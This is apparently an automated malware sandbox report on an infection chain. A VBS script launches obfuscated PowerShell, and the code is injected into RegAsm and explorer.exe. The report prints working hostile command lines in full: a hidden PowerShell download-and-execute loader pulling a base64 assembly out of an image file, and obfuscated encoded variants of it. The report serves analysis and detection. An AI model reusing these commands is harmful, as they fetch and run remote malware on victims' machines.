            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
            Source: explorer.exe, 0000000C.00000002.630243639.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: explorer.exe, 0000000C.00000002.630243639.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 0000000C.00000002.630243639.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
            Source: explorer.exe, 0000000C.00000002.629766627.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
            Source: explorer.exe, 0000000C.00000002.630243639.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081E4C CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,22_2_00081E4C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,22_2_000816C7
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_00129247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,19_2_00129247
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C1000 GetProcessHeap,RtlAllocateHeap,19_2_000C1000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Benign windows process drops PE files
            Source: C:\Windows\explorer.exeFile created: gwseuha.12.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 185.251.91.119 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: prolinice.ga
            Yara detected Powershell download and execute
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTR
            Bypasses PowerShell execution policy
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Windows\explorer.exe EIP: 2801960Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\explorer.exeMemory written: PID: 4056 base: 9F102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 4080 base: FF31B794 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 2480 base: 9F102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 1872 base: 9F102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 2772 base: FF31B794 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 2840 base: 9F102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 2836 base: FF31B794 value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 2704 base: 9F102D value: 90Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: PID: 2460 base: FF31B794 value: 90Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9F102DJump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9F102DJump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9F102DJump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9F102DJump to behavior
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9F102DJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe26_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe26_2_000810A5
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\gwseuha C:\Users\user\AppData\Roaming\gwseuhaJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?e
